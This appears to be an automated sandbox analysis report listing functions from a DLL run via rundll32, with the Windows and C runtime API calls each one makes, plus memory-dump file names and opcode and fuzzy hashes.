                                                                                                          • Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
                                                                                                          • Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10022E4B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Edit
                                                                                                          • API String ID: 0-554135844
                                                                                                          • Opcode ID: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
                                                                                                          • Instruction ID: d6f5fafa54f95e57ce7326ac47ec6df47115e019fe7e1f47642f1b857b3d0bbf
                                                                                                          • Opcode Fuzzy Hash: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
                                                                                                          • Instruction Fuzzy Hash: 4611A131200205BBEE20DAA1AC05F5EB6ECFF46791F930929F956D64B1CF61DC80E564
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 1003748E
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003749F
                                                                                                          • __getptd.LIBCMT ref: 100374AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: MOC$csm
                                                                                                          • API String ID: 803148776-1389381023
                                                                                                          • Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
                                                                                                          • Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
                                                                                                          • _memset.LIBCMT ref: 1002A78B
                                                                                                          • GetWindowTextA.USER32 ref: 1002A7A5
                                                                                                          • lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
                                                                                                          • SetWindowTextA.USER32(?,?), ref: 1002A7C3
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 289641511-0
                                                                                                          • Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
                                                                                                          • Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 10033049
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __amsg_exit.LIBCMT ref: 10033069
                                                                                                          • __lock.LIBCMT ref: 10033079
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 10033096
                                                                                                          • InterlockedIncrement.KERNEL32(01161628), ref: 100330C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271482742-0
                                                                                                          • Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
                                                                                                          • Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Fputc$H_prolog3_
                                                                                                          • String ID:
                                                                                                          • API String ID: 2569218679-3916222277
                                                                                                          • Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
                                                                                                          • Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 100286DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                          • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                          • API String ID: 3274081130-63838506
                                                                                                          • Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
                                                                                                          • Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___BuildCatchObject.LIBCMT ref: 10037AF8
                                                                                                            • Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89
                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 10037B0F
                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 10037B1D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2163707966-1018135373
                                                                                                          • Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
                                                                                                          • Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                          • Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
                                                                                                          • Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043F42, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043F49
                                                                                                            • Part of subcall function 1001E9D0: _strlen.LIBCMT ref: 1001E9EF
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043F66
                                                                                                            • Part of subcall function 10043EBB: std::runtime_error::runtime_error.LIBCPMT ref: 10043EC6
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043F74
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          Strings
                                                                                                          • invalid string position, xrefs: 10043F4E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8H_prolog3RaiseThrow_strlenstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                                          • String ID: invalid string position
                                                                                                          • API String ID: 843739861-1799206989
                                                                                                          • Opcode ID: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
                                                                                                          • Instruction ID: 29482f66c8a5f8716b1ced5184e44cdebd8c398cac92a99365ce02766c2dbf89
                                                                                                          • Opcode Fuzzy Hash: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
                                                                                                          • Instruction Fuzzy Hash: 6FD0127580004D9ADB05DBD0CC55EDE7378EB14311F541835B301EA041DF747A49C658
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031BF
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
                                                                                                          • Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10043377
                                                                                                          • _fgetc.LIBCMT ref: 100434AD
                                                                                                            • Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3
                                                                                                          • _memcpy_s.LIBCMT ref: 10043472
                                                                                                          • _ungetc.LIBCMT ref: 100434F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 9762108-0
                                                                                                          • Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
                                                                                                          • Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10044EAE, Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __flush.LIBCMT ref: 10044F72
                                                                                                          • __fileno.LIBCMT ref: 10044F92
                                                                                                          • __locking.LIBCMT ref: 10044F99
                                                                                                          • __flsbuf.LIBCMT ref: 10044FC4
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                            • Part of subcall function 10032DE1: __decode_pointer.LIBCMT ref: 10032DEC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                          • String ID:
                                                                                                          • API String ID: 3240763771-0
                                                                                                          • Opcode ID: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
                                                                                                          • Instruction ID: f2cbb9fbd7bb741866626b2388375d2bcd999be80ff2815986012e88e7b340f8
                                                                                                          • Opcode Fuzzy Hash: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
                                                                                                          • Instruction Fuzzy Hash: 48418F35A00605DFDB15CFAA888099EB7F6EF80360F328639E855D7580EB71EE45CB48
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003EEC4, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003EEF8
                                                                                                          • __isleadbyte_l.LIBCMT ref: 1003EF2C
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EF5D
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EFCB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
                                                                                                          • Instruction ID: 26013823be584ed4b010159d5efc2338de830fada2216c2f4930337caeab7791
                                                                                                          • Opcode Fuzzy Hash: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
                                                                                                          • Instruction Fuzzy Hash: 52318931A002D6EFDB12DF64C880AAA7BE5EF41352F1286A9F4648F1E1D770AD40DB50
